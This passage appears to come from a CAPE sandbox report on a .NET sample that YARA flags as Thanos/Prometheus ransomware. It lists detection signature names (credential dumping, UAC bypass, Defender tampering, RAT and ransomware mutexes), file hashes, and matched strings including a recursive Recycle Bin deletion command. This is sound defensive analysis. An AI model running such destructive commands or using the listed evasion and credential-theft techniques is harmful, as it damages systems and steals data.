| }, | |
| { | |
| "name": "geodo_banking_trojan", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "banker_spyeye_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "banker_zeus_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bitcoin_opencl", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_primary_patition", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "direct_hdd_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "enumerates_physical_drives", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "physical_drive_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_russkill", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "browser_addon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "chromium_browser_extension_directory", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "browser_helper_object", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "browser_security", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "browser_startpage", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ie_disables_process_tab", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "odbcconf_bypass", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "squiblydoo_bypass", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "squiblytwo_bypass", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bypass_firewall", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "checks_uac_status", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uac_bypass_cmstpcom", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uac_bypass_delegateexecute_sdclt", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uac_bypass_fodhelper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cape_extracted_content", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "carberp_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "clears_logs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_obfuscation", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_switches", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_terminate", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_forfiles_wildcard", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_http_link", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_long_string", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_reversed_http_link", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "long_commandline", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_renamed_commandline", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "copies_self", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "credwiz_credentialaccess", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "enables_wdigest", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "vaultcmd_credentialaccess", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "file_credential_store_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "file_credential_store_write", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "kerberos_credential_access_via_rubeus", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "registry_credential_dumping", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "registry_credential_store_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "registry_lsa_secrets_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "comsvcs_credentialdump", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cryptomining_stratum_command", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cypherit_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "darkcomet_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "datop_loader", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "deepfreeze_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "deletes_executed_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_app_launch", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_auto_app_termination", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_appv_virtualization", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_backups", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_browser_warn", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_context_menus", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_cpl_disable", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_crashdumps", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_event_logging", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_folder_options", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_notificationcenter", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_power_options", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_restore_default_state", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_run_command", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_smartscreen", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_startmenu_search", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_system_restore", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_uac", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_wer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_windows_defender", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_windows_defender_logging", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_windows_defender_contextmenu", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "windows_defender_powershell", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_windows_file_protection", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_windowsupdate", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_winfirewall", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "adfind_domain_enumeration", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "domain_enumeration_commands", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "andromut_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "downloader_cabby", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "phorpiex_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "protonbot_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "driver_filtermanager", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dropper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dll_archive_execution", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "lnk_archive_execution", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "script_archive_execution", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "excel4_macro_urls", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "escalate_privilege_via_ntlm_relay", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spooler_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spooler_svc_start", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mapped_drives_uac", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "hides_recycle_bin_icon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "apocalypse_stealer_file_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "arkei_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "azorult_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_bitcoin", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cryptbot_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "echelon_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_ftp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_im", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_mail", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "masslogger_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "poullight_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "purplewave_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "quilclipper_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "qulab_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "qulab_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "asyncrat_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Evade_Execution_Via_ASPNet_Compiler", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Evade_Execute_Via_DeviceCredentialDeployment", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Evade_Execution_Via_Filter_Manager_Control", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_appvlp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_pcalua", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Execute_Binary_Via_OpenSSH", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_pcalua", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Execute_Binary_Via_PesterPSModule", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Execute_Binary_Via_ScriptRunner", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_ttdinject", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Execute_Binary_Via_VisualStudioLiveShare", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Execute_Msiexec_Via_Explorer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_remote_msi", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_suspicious_powershell_via_runscripthelper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_suspicious_powershell_via_sqlps", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Perform_Malicious_Activities_Via_Headless_Browser", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Register_DLL_Via_CertOC", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Register_DLL_Via_MSIEXEC", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Register_DLL_Via_Odbcconf", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Scriptlet_Proxy_Execution_Via_Pubprn", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ie_martian_children", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_martian_children", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mimics_icon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "masquerade_process_name", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mimikatz_modules", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ms_office_cmd_rce", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mount_copy_to_webdav_share", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "potential_protocol_tunneling_via_legit_utilities", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "potential_protocol_tunneling_via_qemu", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_execution_via_dotnet_remoting", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_certs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dotnet_clr_usagelog_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_hostfile", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_oem_information", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_security_center_warnings", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_uac_prompt", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_blockchain", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_opennic", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_paste_site", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_reverse_proxy", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_temp_file_storage", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_temp_urldns", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_url_shortener", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_doh_tls", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_tld", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_tor_service", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_code_page", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_addinloading", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_perfkey", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_macro", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "changes_trust_center_settings", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_vba_trust_access", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_macro_autoexecution", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_macro_ioc", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_macro_malicious_prediction", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_macro_suspicious", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_aslr_bypass", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_anomaly_characterset", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_anomaly_version", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_embedded_content", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_embedded_office_file", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rtf_exploit_static", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_security", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_anomalous_feature", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_dde_command", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_armadillo_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_armadillo_regkey", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_safeboot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_ifeo", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_silent_process_exit", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_rdp_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_rdp_shadowing", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_shim_database", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powerpool_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_scriptblock_logging", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_command_suspicious", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_renamed", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_reversed", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_variable_obfuscation", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "prevents_safeboot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cmdline_process_discovery", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cryptomix_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dharma_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ransomware_extensions", | |
| "time": 0.001 | |
| }, | |
| { | |
| "name": "ransomware_files", | |
| "time": 0.001 | |
| }, | |
| { | |
| "name": "fonix_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "gandcrab_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "germanwiper_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "medusalocker_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "medusalocker_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "nemty_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "nemty_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "pysa_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ransomware_radamant", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ransomware_recyclebin", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "revil_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ransomware_revil_regkey", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "satan_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "snake_ransom_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stop_ransom_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stop_ransomware_cmd", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_beebus_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "blacknet_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "blackrat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "crat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dcrat_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dcrat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_fynloski_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "limerat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "limerat_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "lodarat_file_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modirat_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "njrat_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "obliquerat_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "obliquerat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "parallax_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_pcclient", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_plugx_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_poisonivy_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_quasar_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ratsnif_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_spynet", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "venomrat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "warzonerat_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "warzonerat_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "xpertrat_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "xpertrat_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_xtreme_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "recon_fingerprint", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "remcos_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "remcos_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "remcos_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rdptcp_key", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_rdp_clip", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_remote_desktop_session", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_networking_icon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_pinned_programs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_security_maintenance_icon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_startmenu_defaults", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "removes_username_startmenu", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spicyhotpot_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "sniffer_winpcap", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spreading_autoruninf", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_hidden_extension", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_hiddenreg", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_hide_notifications", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_webhistory", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "sysinternals_psexec", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "sysinternals_tools", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "tampers_etw", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "lsa_tampering", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "tampers_powershell_logging", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "targeted_flame", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "territorial_disputes_sigs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "trickbot_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "fleercivet_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "lokibot_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ursnif_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_adfind", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_ms_protocol", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "neshta_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "renamer_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "owa_web_shell_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "web_shell_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "web_shell_processes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dotnet_csc_build", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "multiple_explorer_instances", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "script_tool_executed", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_certutil_use", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_command_tools", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_mpcmdrun_use", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_ping_use", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_powershell_copyitem", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_appcmd", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_csvde_ldifde", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_cipher", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_clickonce", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_curl", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_dsquery", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_esentutl", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_finger", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_mode", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_ntdsutil", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_nltest", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_windows_utilities_xcopy", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "wmic_command_suspicious", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "scrcons_wmi_script_consumer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "allaple_mutexes", | |
| "time": 0.0 | |
| } | |
| ], | |
| "reporting": [ | |
| { | |
| "name": "BinGraph", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "CAPASummary", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "MITRE_TTPS", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "PCAP2CERT", | |
| "time": 0.0 | |
| } | |
| ] | |
| }, | |
| "target": { | |
| "category": "file", | |
| "file": { | |
| "name": "ae66e009e16f0fad3b70ad20", | |
| "path": "/opt/CAPEv2/storage/binaries/ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75", | |
| "guest_paths": "", | |
| "size": 102400, | |
| "crc32": "01AE41BB", | |
| "md5": "03b76a5130d0df8134a6bdea7fe97bcd", | |
| "sha1": "60053d661ed03cd2a07f6750532e6ef11abcc4e5", | |
| "sha256": "ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75", | |
| "sha512": "d82eb0858819fc50b28910dfe8d537c8e7b0f34bc8953e48e7799b55ffe9320775df38c0ae38420808a0ddd84ea0d0c6b989b4348fcac52bbf2d1af7777091b8", | |
| "rh_hash": null, | |
| "ssdeep": "3072:P6seqCp31Hgsp9a9GTrda8CAKLTsWkyc:CqCp31Z9a9GTrk8CV/t", | |
| "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", | |
| "yara": [], | |
| "cape_yara": [ | |
| { | |
| "name": "Thanos", | |
| "meta": { | |
| "author": "ditekSHen", | |
| "description": "Detects Thanos / Prometheus / Spook ransomware", | |
| "cape_type": "Thanos Payload" | |
| }, | |
| "strings": [ | |
| "<WorkerCrypter2>b__", | |
| "<Encrypt2>b__", | |
| "<Killproc>b__", | |
| "<GetIPInfo>b__", | |
| "<MacAddress>k__", | |
| "<IPAddress>k__", | |
| "<Crypt>b__", | |
| "A\u0000d\u0000i\u0000t\u0000i\u0000o\u0000n\u0000a\u0000l\u0000 \u0000K\u0000e\u0000y\u0000I\u0000d\u0000:\u0000", | |
| "p\u0000r\u0000o\u0000c\u0000e\u0000s\u0000s\u0000 \u0000c\u0000a\u0000l\u0000l\u0000 \u0000c\u0000r\u0000e\u0000a\u0000t\u0000e\u0000 \u0000c\u0000m\u0000d\u0000.\u0000e\u0000x\u0000e\u0000 \u0000/\u0000c\u0000 \u0000\\\u0000\\\u0000", | |
| "/\u0000c\u0000 \u0000r\u0000d\u0000 \u0000/\u0000s\u0000 \u0000/\u0000q\u0000 \u0000%\u0000S\u0000Y\u0000S\u0000T\u0000E\u0000M\u0000D\u0000R\u0000I\u0000V\u0000E\u0000%\u0000\\\u0000$\u0000R\u0000e\u0000c\u0000y\u0000c\u0000l\u0000e\u0000.\u0000b\u0000i\u0000n\u0000", | |
| "\\\u0000H\u0000O\u0000W\u0000_\u0000T\u0000O\u0000_\u0000D\u0000E\u0000C\u0000Y\u0000P\u0000H\u0000E\u0000R\u0000_\u0000F\u0000I\u0000L\u0000E\u0000S\u0000.\u0000", | |
| "N\u0000t\u0000O\u0000p\u0000e\u0000n\u0000P\u0000r\u0000o\u0000c\u0000e\u0000s\u0000s\u0000", | |
| "3\u00007\u00004\u00007\u0000b\u0000d\u0000b\u0000f\u0000-\u00000\u0000e\u0000f\u00000\u0000-\u00004\u00002\u0000d\u00008\u0000-\u00009\u00002\u00003\u00004\u0000-\u00007\u00000\u0000d\u00006\u00008\u00008\u00000\u00001\u0000f\u00004\u00000\u00007\u0000", | |
| "WalkDirectoryTree" | |
| ], | |
| "addresses": { | |
| "f1": 63856, | |
| "f2": 64265, | |
| "f3": 64622, | |
| "f4": 66216, | |
| "f5": 57764, | |
| "f6": 57792, | |
| "f7": 63555, | |
| "s1": 71347, | |
| "s2": 83968, | |
| "s3": 68220, | |
| "s4": 71385, | |
| "s7": 88321, | |
| "s10": 76144, | |
| "s14": 56752 | |
| } | |
| } | |
| ], | |
| "clamav": [], | |
| "tlsh": "T128A31A083AE89868F1BEDFB1C9F029508B79F5676E13E21F0DC501962A32788DDD5DB4", | |
| "sha3_384": "af121e9256590365c915cbeb184f7342c6ef932ce9b6539d50594c50ddfc0c6a2c788849172dd37d59e03465678da71b", | |
| "pe": { | |
| "guest_signers": { | |
| "aux_sha1": null, | |
| "aux_timestamp": null, | |
| "aux_valid": false, | |
| "aux_error": true, | |
| "aux_error_desc": "CryptCATAdminCalcHashFromFileHandle returned error: 0x800700C1 Arr3 no es una aplicacion Win32 valida. SignTool Error: No signature found.", | |
| "aux_signers": [] | |
| }, | |
| "digital_signers": [], | |
| "imagebase": "0x00cc0000", | |
| "entrypoint": "0x72667cef", | |
| "ep_bytes": null, | |
| "peid_signatures": null, | |
